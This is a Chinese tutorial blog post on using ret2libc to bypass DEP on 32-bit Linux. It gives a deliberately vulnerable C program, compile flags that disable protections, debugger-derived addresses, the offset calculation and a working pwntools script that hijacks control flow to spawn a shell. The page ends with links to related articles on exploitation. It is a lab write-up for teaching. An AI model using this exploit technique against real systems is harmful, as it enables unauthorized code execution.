linux ret,Linux下利用Ret2Libc绕过DEP

最新推荐文章于 2022-02-28 20:12:18 发布
最新推荐文章于 2022-02-28 20:12:18 发布
阅读量340 收藏
点赞数
文章标签: linux ret

Linux下利用Ret2Libc绕过DEP

⑴.  原理分析:

系统库函数通常是不受DEP(关于DEP,可以查看我之前文章的详细介绍)保护的,所以通过将返回地址指向系统函数可以绕过DEP保护,所以可以通过调研系统函数system()获得shell。

⑵.环境准备:

i.漏洞代码:

#include

#include

#include

#include

void flow(){

char buf[128];

read(STDIN_FILENO,buf,256);

}

int main(){

flow();

char a[]="hello";

write(STDOUT_FILENO,a,strlen(a));

return 0;

}

编译指令:

gcc -fno-stack-protector -g -m32 -o vuln vuln.c

ii.测试环境:

测试系统:kaii 2.0 rolling

辅助插件:peda

⑶.测试分析:

i.存在漏洞的函数flow返回地址:

235a216a765892bbd40eac7916913583.png

漏洞函数返回地址:0xffffd2ac。

ii.缓冲区起始地址:

9b66ec2d077a1d53372ed4df6808ce08.png

缓冲区起始地址:0xffffd220

iii. 系统函数system()地址

4ceea50f5deb13ad7540e9ea24c565ae.png

iv.System参数:”/bin/sh”

139eeaca216695c0fda2b2a181bb5892.png

v. system函数源码:

int system(const char * cmdstring)

{

pid_t pid;

int status;

if(cmdstring == NULL){

return (1);

}

if((pid = fork())<0){

status = -1;

}

else if(pid == 0){

execl("/bin/sh", "sh", "-c", cmdstring, (char *)0);

_exit(127); //子进程正常执行则不会执行此语句

}

else{

while(waitpid(pid, &status, 0) < 0){

if(errno != EINTER){

status = -1;

break;

}

}

}

return status;

}

⑷.攻击过程:

i.计算攻击shellcode长度:

我们的目的是用system函数的地址覆盖返回地址,将system函数后的参数地址(后8字节,后四字节是返回地址)覆盖为我们找到的”/bin/sh”的地址。

所以size(shellcode)= address(ret)- address(buff)+ 12 = 0xffffd2ac – 0xffffd220 + 12 = 152

ii. 设计shellcode结构:

84b600c0e74c542680db0c5e06052f18.png

注:因为我们劫持程序后获得shell之后不会再返回,所以addr(ret:system)可以是任意地址。

iii.编写漏洞利用脚本:

from pwn import *

sh = 0xf7f4a808

system = 0xf7e0bc70

ret = 0x565555d4

payload = 'a'*140+p32(system)+p32(ret)+p32(sh)

p = process('./vuln')

p.send(payload)

p.interactive()

执行:

成功。

内存保护机制及绕过方法——利用Ret2Libc绕过DEP之VirtualProtect函数

利用Ret2Libc绕过DEP之VirtualProtect函数 ⑴.  原理分析: i.相关概念: VirtualProtect()函数: BOOL WINAPI VirtualProtect( _ ...

内存保护机制及绕过方法——利用Ret2Libc绕过DEP之ZwSetInformationProcess函数

1.    DEP内存保护机制 1.1   DEP工作原理 分析缓冲区溢出攻击,其根源在于现代计算机对数据和代码没有明确区分这一先天缺陷,就目前来看重新去设计计算机体系结构基本上是不可能的,我们只能靠 ...

【java】 linux下利用nohup后台运行jar文件包程序

Linux 运行jar包命令如下: 方式一: java -jar XXX.jar 特点:当前ssh窗口被锁定,可按CTRL + C打断程序运行,或直接关闭窗口,程序退出 那如何让窗口不锁定? 方式二 ...

linux下利用elk&plus;redis 搭建日志分析平台教程

linux下利用elk+redis 搭建日志分析平台教程 http://www.alliedjeep.com/18084.htm   elk 日志分析+redis数据库可以创建一个不错的日志分析平台了 ...

嵌入式 linux下利用backtrace追踪函数调用堆栈以及定位段错误

嵌入式 linux下利用backtrace追踪函数调用堆栈以及定位段错误 2015-05-27 14:19 184人阅读 评论(0) 收藏 举报  分类: 嵌入式(928)  一般察看函数运行时堆栈的 ...

linux下利用openssl来实现证书的颁发(详细步骤)--转载和修改

离乱説
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
linux中ret2libc入门与实践
counsellor的专栏
08-23 6726
前言 本来想找一个windows下的栈溢出漏洞的poc作为漏洞分析路程的开篇,但是一路走来遇到了太多的问题,大大小小,什么都有。同时因为工作事情比较多,能拿出来调试和写文章的时间也是断断续续。昨天刚有一点心得,今天就忘了一大半,同时会推翻自己之前的结论。 经过漫长的求证过程,打算把NX利剑-ret2libc这种方法和其原理用简单直接的方式展示出来。 简介 DEP-数据执行保护(Data...
linux绕过内存写保护,内存保护机制及绕过方法——利用Ret2Libc绕过DEP之VirtualProtect函数...
weixin_39709262的博客
05-01 1127
利用Ret2Libc绕过DEP之VirtualProtect函数⑴. 原理分析:i.相关概念:VirtualProtect()函数:BOOL WINAPI VirtualProtect(_In_ LPVOID lpAddress, //目标地址的起始位置_In_ SIZE_T dwSize, //区域大小_In_ DWORD flNewProtect, //新的保护属性,设置为...
linux call 汇编,汇编 ret,retf和call
weixin_33699970的博客
05-18 599
ret指令用栈中的数据,修改IP,实现近转移1,(IP)=((SS)*16+(SP))2,(SP)=(SP)+2相当于 pop IPretf指令用栈中的数据修改CS和IP,实现远转移1,(IP)=((SS)*16+(SP))2,(SP)=(SP)+23,(CS)=((SS)*16+(SP))4,(SP)=(SP)+2相当于pop IP,pop CScall指令分两步操作1,将当前的IP或IP,CS...
内存安全试验:ret2libc绕过DEP
weixin_42072280的博客
05-08 704
参考资料 1.https://www.cnblogs.com/0831j/p/9219243.html (实验、原理) 2.https://www.cnblogs.com/xidian-wws/p/10819073.html(getenvaddr那个的说明) 实验过程中的一些问题 ...
40_Linux下的文件权限管理
sanbanzui2008的博客
03-20 269
st_mode中记录文件的权限位st_mode本质上是一个32位的数,类型其实就是unsigned int,这个数里的每一个二进制位表示一个含义我们使用的时候使用专门的掩码取出需要的标志位ls -l打印详细列表文件类型和权限列表  注意日期是建档日期文件操作时的权限规则讲真,文件访问操作,不仅与文件的属性有关,还与访问者的权限有关,分别判断很繁琐,用一个函数判断有没有访问权限就是access调用最...
ret2libc exploit
07-07
exploit hack linux ret2libc
Performing a ret2libc Attack-InVoLuNTaRy
04-24
ret2libc
Ret2Libc 实战之利用 ZwSetInformationProcess.zip
06-11
使用ntdll库中原有的ZwSetInformationProcess代码关闭DEP
ret2libc2pwn 入门题
02-11
pwn 入门题
ret_hrite.rar_Linux/Unix编程
09-23
程序代码说明 P0301:数字图像矩阵数据的显示及其傅立叶变换 P0302:二维离散余弦变换的图像压缩 P0303:采用灰度变换
CALL和RET指令
AndrewYZWang的博客
01-06 2708
CALL和RET指令 call和ret指令都是转移指令,它们都是修改IP,或同时修改CS和IP。它们经常被用来实现子程序的设计。 也就是常用来实现程序的加载和返回 ret和retf ret指令用栈中的数据,修改IP的内容,从而实现近转移; retf指令用栈中的数据,修改CS和IP的内容,从而实现远转移; CPU执行ret指令相当于执行; pop IP CPU执行retf指令相当
CTFHub-bypass disable_function
a21536545645的博客
07-10 748
一,LD_PRELOAD 前置知识: putenv:php函数,可以设置环境变量 mail(),error_log(): php的函数,会调用系统的sendmail函数发送邮件 LD_PRELOAD:linux环境变量,作用是他设置的.so会在程序本身的.so之前执行。 题目情况 存在一个shell,用蚂剑直接连接。进入虚拟终端执行命令发现ret=127,说明不能执行系统命令 /?ant=phpinfo();看到禁用了很多函数 但是没有禁用putenv,error_log,email这几个函数 思路 创建
CTF第十四天
qq_52680097的博客
08-28 863
CTF第十四天 太久没写了,今天挑战下题目 LD_PRELOAD 太久没整了,我都忘了PHP是啥,再复习一遍。 PHP是一种能在服务器端执行的脚本语言,也可嵌入到HTML中 看到这个提示,先来了解下Linux LD_PRELOAD环境变量 这里有关于动态链接库的详解和Linux LD_PRELOAD环境变量简介 动态链接库详解【一】 linux 环境变量LD_PRELOAD简介 定义优先加载的动态链接库 了解了这些,大概就能知道这题的原理了 原理:php部分函数在执行的时候会加载动态库里面的函数,而LD_
Linux常用指令大全【详解】
qq_46416934的博客
02-28 3653
本文将给大家详细介绍Linux常用的指令、演示以及一些基础知识的讲解 目录 ls指令 file指令 pwd命令 whoami指令 cd指令 相对路径和绝对路径 which指令 touch指令 mkdir指令 添加用户信任关系 rmdir指令 rm指令 man指令? cp指令 mv指令 ? cat指令 echo指令 重定向 more指令 less指令 head 指令 tail指令 管道操作 date指令 cal指令 find指令 grep指令 zip指令/unzip指令 tar指令 bc指令 uname?指
linux RetHat 7.4 安装yum网络源笔记
xt586的专栏
05-04 2264
本文参考:https://www.cnblogs.com/zdxster/p/5344944.html0、查看rethat版本号[root@localhost yum.repos.d]#  cat /etc/redhat-release Red Hat Enterprise Linux Server release 7.4 (Maipo)1、保证本机电脑能上网;[root@localhost ~]...
RetHatLinux cp强制覆盖解决办法
大河湾的专栏
12-20 904
情景: 当在linux中执行cp命令时,有时候需要将一个目录中的所有文件覆盖其他一个目中的所有文件。 但是,使用cp -Rf 时还是会提示是否覆盖。 原因: 在Linux下使用CP命令,经常会提示是否覆盖,如果是太批量的文件覆盖,老是这么提示,会很烦的。那如何解决这个问题呢?     我们先来看一下原因吧!     一般我们使用的命令是cp -rf sourcefile
Linux下C程序执行shell命令并获取返回结果的方法
yhcasey的博客
03-15 1415
Linux下的C编程有以下几种方法可以执行shell命令 system()函数exec函数簇popen()函数 如果还需要获取返回结果,有两种较简单方便的方法 popen()函数匿名管道 1.system()函数 所需头文件:#include<stdlib.h> 函数原型:int system(const char *cmdstring);   &nbs...
pwn ret2libc原理
最新发布
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值